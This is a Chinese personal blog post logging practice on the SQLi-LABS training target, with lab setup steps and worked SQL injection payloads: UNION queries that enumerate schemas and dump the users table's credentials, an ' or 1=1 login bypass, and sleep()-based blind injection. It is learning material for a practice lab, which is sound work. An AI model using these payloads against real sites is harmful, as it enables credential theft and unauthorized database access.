
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>SQL注入 | 楸坪的GitHub博客</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="">
    <meta name="description" content="一些教程的记录:

来自CSDN  通过sqli-labs学习sql注入——基础挑战之less1-10

来自知乎  SQL注入：Error Based Injection

来自i春秋 从基础开始:

一本书: 链接:http://pan.baidu.com/share/link?shareid=1082654025&amp;amp;uk=3477169565  密码: vhus


SQLi-LABS是    印度程序员（GitHub用户名Audi-1）写的一个用于学习SQL注入的教程。此教程包含的脚本可以在用户本地的MYSQL中创建一系列数据库，使用localhost访问以作为靶机进行练习。
实际上，网上已经有一个已经搭建...">
    
        <link rel="icon" href="/favicon.ico">
    
    
        
            <link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
        
            <link rel="stylesheet" href="/css/stage.css">
        
            <link rel="stylesheet" href="/css/avatar-bg.css">
        
    
<meta name="generator" content="Hexo 6.1.0"></head>

<body>
<header id="header">
    <div class="menu">
        <i class="fa fa-bars"></i>
    </div>
    <div class="header-main">
        <h1><a href="/">楸坪的GitHub博客</a></h1>
    </div>
    <div id="nav">
        <div class="nav-img" id="nav-img"></div>
        <div class="sentences">
            时光荏苒，旦夕之间，略有遗憾，似白驹过隙，蹉跎自悟。
        </div>
    </div>
</header>

<div id="content-outer">
    <div id="content-inner">
        <div class="clearfix">
    <article id="post">
        <h1>SQL注入</h1>
        <div class="create">
            <span>创建于</span>
            
                <time datetime="2020-05-01T11:00:01.000Z">
                    2020-05-01
                </time>
            
            
        </div>
        <p>一些教程的记录:</p>
<ul>
<li><p>来自CSDN  <a target="_blank" rel="noopener" href="https://blog.csdn.net/u012763794/article/details/51207833">通过sqli-labs学习sql注入——基础挑战之less1-10</a></p>
</li>
<li><p>来自知乎  <a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/74907340">SQL注入：Error Based Injection</a></p>
</li>
<li><p>来自i春秋 <a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-9518-1-1.html">从基础开始:</a></p>
</li>
<li><p>一本书: 链接:<a target="_blank" rel="noopener" href="http://pan.baidu.com/share/link?shareid=1082654025&amp;uk=3477169565">http://pan.baidu.com/share/link?shareid=1082654025&amp;uk=3477169565</a>  密码: vhus</p>
</li>
</ul>
<p>SQLi-LABS是    印度程序员（GitHub用户名Audi-1）写的一个用于学习SQL注入的教程。此教程包含的脚本可以在用户本地的MYSQL中创建一系列数据库，使用localhost访问以作为靶机进行练习。</p>
<p>实际上，网上已经有一个已经搭建好的靶机，运行于腾讯云的Ubuntu操作系统上，地址为<a target="_blank" rel="noopener" href="http://111.231.88.117/sqli_lab/sqli-labs-php7/">http://111.231.88.117/sqli_lab/sqli-labs-php7/</a>.不过这个不是我搭建的,如果不能用了不要找我.  &#x3D;_&#x3D;</p>
<h2 id="配置环境-mysql-Apache"><a href="#配置环境-mysql-Apache" class="headerlink" title="配置环境:mysql+Apache"></a>配置环境:mysql+Apache</h2><p>不建议在Windows上配置环境,除非本来电脑上没有MySQL,这时可以用PHPstudy这个集成环境.</p>
<h3 id="Apache的注意事项"><a href="#Apache的注意事项" class="headerlink" title="Apache的注意事项"></a>Apache的注意事项</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/maq56310/article/details/80580286">https://blog.csdn.net/maq56310/article/details/80580286</a></p>
<p>如果443端口被占用,可以用</p>
<pre><code>netstat -ano //查看端口号对应的pid
taskkill /f /pid 1234 //杀死1234进程,也可在任务管理器中杀死.
</code></pre>
<p>conf&#x2F;httpd.conf的监听端口默认为80,改为8088解决</p>
<p>Sqli-labs文件夹应该放在C:\Apache24\htdocs下,而不是网上所有的其他博客说的web或者www</p>
<p>启动只能用 <a target="_blank" rel="noopener" href="http://localhost:8088/Sqli-labs/">http://localhost:8088/Sqli-labs/</a> ,不能用IP地址,不然打不开</p>
<p>实际上,Windows环境下搜到的各种解决方法都是不可用的,并且存在破坏本机环境的情况,我的mysql就不能用了.改用macos</p>
<h3 id="在macOS上配置环境"><a href="#在macOS上配置环境" class="headerlink" title="在macOS上配置环境"></a>在macOS上配置环境</h3><p>很简单,首先安装docker,然后</p>
<pre><code>sudo docker pull acgpiano/sqli-labs
</code></pre>
<p>如果网络错误,建议开全局代理,之后</p>
<pre><code>docker run -dt --name sqli-lab -p 80:80 acgpiano/sqli-labs:latest
</code></pre>
<p>第一个80是主机的端口,将docker内的环境映射到物理机的80端口中</p>
<p>浏览器打开localhost即可访问</p>
<p>重启以后,需要</p>
<pre><code>docker stop sqli-lab
docker rm sqli-lab
docker run -dt --name sqli-lab -p 80:80 acgpiano/sqli-labs:latest
</code></pre>
<p>并且在网页里需要重新建数据库</p>
<h2 id="基于错误的"><a href="#基于错误的" class="headerlink" title="基于错误的"></a>基于错误的</h2><h3 id="Less1-单引号注入-字符串-get"><a href="#Less1-单引号注入-字符串-get" class="headerlink" title="Less1 单引号注入,字符串,get"></a>Less1 单引号注入,字符串,get</h3><p>get是直接把参数写在URL里面的(-_-)!</p>
<p>MySQL中的注释是– (两个减号一个空格,在URL中,最后的空格会被去掉,因此使用的时候用的是–+)</p>
<p>输入 ?id&#x3D;1 返回 </p>
<pre><code>Your Login name:Dumb
Your Password:Dumb
</code></pre>
<p>数字改成2,返回另外两个name和password</p>
<p>输入 ?id&#x3D;2’ 返回 </p>
<pre><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;2&#39;&#39; LIMIT 0,1&#39; at line 1
</code></pre>
<p>猜测SQL语句是 select xxx from xxx where ‘’ limit 0,1</p>
<h4 id="获取列数"><a href="#获取列数" class="headerlink" title="获取列数"></a>获取列数</h4><p>试图获取其他的信息需要使用union语句.union语句需要前面的结果和后面的结果的列数相同,因此需要得到原有的SQL语句查询结果中共有几列.接下来试图获取表的列数,方法是使用order by.在URL中输入:</p>
<pre><code>?id=1 order by 3 --+
</code></pre>
<p>可以正常返回结果,说明该表至少有三列.确定列数,只要order by 后面的数字一个一个试就可以了.由于最开始时已经返回了两个值,所以从3开始试即可.这个表中,试到4,即</p>
<pre><code>?id=1 order by 4 --+
</code></pre>
<p>就出现了错误提示,所以共有三列.</p>
<p>而实际上页面回显的语句只有两个,因此需要知道显示的是哪两列,输入</p>
<pre><code>?id=-1’ union select 1,2,3 --+
</code></pre>
<p>结果会显示数字2,3所以可知显示的是第2,3列.由于结果只显示第一行查询结果,这行语句中,id&#x3D;-1使得union左边的语句查询结果为空以显示右边自行构造的SQL语句的结果,-1也可替换为其他的猜测不存在的数字.</p>
<h4 id="获取其他信息"><a href="#获取其他信息" class="headerlink" title="获取其他信息"></a>获取其他信息</h4><p>数据库名:</p>
<pre><code>-1&#39; union select 1,2,group_concat(schema_name) from information_schema.schemata --+
</code></pre>
<p>group_concat让结果变成一行,因为返回的结果只显示一行&#x3D;_&#x3D;</p>
<p>表名:</p>
<pre><code>?id=-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= &#39;security&#39; --+
</code></pre>
<p>列名:</p>
<pre><code>?id=-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_name= &#39;users&#39; --+ 得到列名为id,username,password
</code></pre>
<p>数据表:<br>    ?id&#x3D;-1’ union select 1,group_concat(username),group_concat(password) from users –+ </p>
<h3 id="less2-3-4-基于错误的"><a href="#less2-3-4-基于错误的" class="headerlink" title="less2,3,4 基于错误的"></a>less2,3,4 基于错误的</h3><p>经过艰难的测试,靶机1,2,3,4的SQL语句实际上大同小异,区别主要在id被什么符号包裹在内,写出正确的闭合的SQL语句即可.他们可能被包裹在括号,双引号,单引号,或者前面几个的组合(或者啥也没有)的里面,只要有几个错误多试几次就容易看出来.</p>
<h3 id="less11-Post类型"><a href="#less11-Post类型" class="headerlink" title="less11 Post类型"></a>less11 Post类型</h3><p> 单引号<br>这个就是我们看见的输入账号和密码的类型了</p>
<p>用户名输入:<strong>database()–+</strong>, 密码输入<strong>1&#x3D;1 –</strong>,报错:<strong>…use near ‘database()–+’ and password&#x3D;’1&#x3D;1 –’ LIMIT 0,1’ at line 1</strong>.从这里看出,用户名和密码的验证是在同一行的,并且先验证用户名,那么我们在用户名的位置添加注释,尝试填写用户名为<strong>aaa’or 1&#x3D;1 – (此处有空格)</strong>,密码填入<strong>123</strong>(密码可以不填),显示登陆成功,输出提示:<strong>Your Login name:Dumb Your Password:Dumb.</strong></p>
<p>这个其实很简单,发现用户名和密码在同一行,那么在用户名那个地方填写注入语句即可.</p>
<h3 id="布尔-时间-盲注"><a href="#布尔-时间-盲注" class="headerlink" title="布尔,时间,盲注"></a>布尔,时间,盲注</h3><p>这种类型的SQL注入是最繁琐的.无论URL中的参数输入什么,都返回同一句话.</p>
<p>这样以上基于错误的方式就不能奏效了.因此采用另一种方法,利用if()和sleep(),观察网页加载的时间,从而判断语句是否正确执行.尝试: ?id&#x3D;1’ and sleep(3) –+,发现网页加载明显有延迟,说明注入成功.获取数据库名等的方法也与有回显的注入方法完全不一样.简而言之,没有回显的注入需要猜测或者穷举(可以用二分法查找,更快)结果中的每一个字符,来获得想要的结果.</p>
<p>获取数据库名称长度: ?id&#x3D;1’ and if(length(database())&#x3D;8 , sleep(3), 1) –+,这行语句有明显加载延迟,说明数据库名称长度是8.在实际编写的脚本中往往使用不等号,减小猜测的时间复杂度.</p>
<p>获取数据库名: ?id&#x3D;1’ and if(left(database(),1)&#x3D;’s’ , sleep(3), 1) –+,得知数据库名的第一个字符为s.同样,一般用ascii()方法将字符转换成数字,这样可以用二分法减小时间复杂度.比如 ?id&#x3D;1’ and if(((ascii(substr(database(),0,1)))&gt;100),sleep(3),0)–+.</p>
<p>布尔盲注的手动操作非常繁琐,因此往往都是用脚本执行的.获取其他信息的方法类似,不再赘述.</p>

        <div>
            <ul class="tags-category-list" itemprop="keywords"><li class="tags-category-list-item"><a class="tags-category-list-link" href="/tags/SQL/" rel="tag">SQL</a></li></ul>
        </div>
        <div class="bottom-line"></div>
        
    <nav id="article-nav">
        
            <a href="/2020/05/03/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/" id="article-nav-newer" class="article-nav-link-wrap">
        <span class="article-nav-title">
            
                LeetCode刷题记录2
            
        </span>
                <strong class="article-nav-caption">&gt;</strong>
            </a>
        
        
            <a href="/2020/04/24/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" id="article-nav-older" class="article-nav-link-wrap">
                <strong class="article-nav-caption">&lt;</strong>
                <span class="article-nav-title">
                    
                        LeetCode刷题记录
                </span>
                
            </a>
        
    </nav>


        
            <div id="stageComment" class="comment" style="margin-top: 27px;"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
  var notify = 'true' == true ? true : false;
  var verify = 'false' == true ? true : false;
  window.onload = function() {
    new Valine({
      el: '#stageComment',
      notify: notify,
      verify: verify,
      app_id: "GV9bOGJTE9kej1irLoW8D7PK-gzGzoHsz",
      app_key: "U1kgYRmAKV1vwWYQqo2W1wze",
      placeholder: "ヾﾉ≧∀≦)o来啊，快活啊!",
      avatar:"mm"
    });
  }
</script>

        
    </article>
    <div id="toc">
        
            <h2>文章目录</h2>
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E7%8E%AF%E5%A2%83-mysql-Apache"><span class="toc-number">1.</span> <span class="toc-text">配置环境:mysql+Apache</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Apache%E7%9A%84%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="toc-number">1.1.</span> <span class="toc-text">Apache的注意事项</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8macOS%E4%B8%8A%E9%85%8D%E7%BD%AE%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">在macOS上配置环境</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84"><span class="toc-number">2.</span> <span class="toc-text">基于错误的</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Less1-%E5%8D%95%E5%BC%95%E5%8F%B7%E6%B3%A8%E5%85%A5-%E5%AD%97%E7%AC%A6%E4%B8%B2-get"><span class="toc-number">2.1.</span> <span class="toc-text">Less1 单引号注入,字符串,get</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%88%97%E6%95%B0"><span class="toc-number">2.1.1.</span> <span class="toc-text">获取列数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%85%B6%E4%BB%96%E4%BF%A1%E6%81%AF"><span class="toc-number">2.1.2.</span> <span class="toc-text">获取其他信息</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less2-3-4-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84"><span class="toc-number">2.2.</span> <span class="toc-text">less2,3,4 基于错误的</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less11-Post%E7%B1%BB%E5%9E%8B"><span class="toc-number">2.3.</span> <span class="toc-text">less11 Post类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%83%E5%B0%94-%E6%97%B6%E9%97%B4-%E7%9B%B2%E6%B3%A8"><span class="toc-number">2.4.</span> <span class="toc-text">布尔,时间,盲注</span></a></li></ol></li></ol>
        
    </div>
</div>

    </div>
</div>
<footer id="footer">
    <div id="copyright">&copy; Wentao Hao  2022</div>
    <div id="theme">
        Powered by <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a>. Theme by <a target="_blank" rel="noopener" href="https://github.com/markyong/hexo-theme-stage">Stage</a>
    </div>
</footer>
<script src="/lib/js/waterrippleeffect.min.js"></script>
<script src="/js/header-bg.main.js"></script>

    <script src="/lib/js/smooth-scroll.min.js"></script>
    <script src="/js/toc.main.js"></script>

</body>
</html>
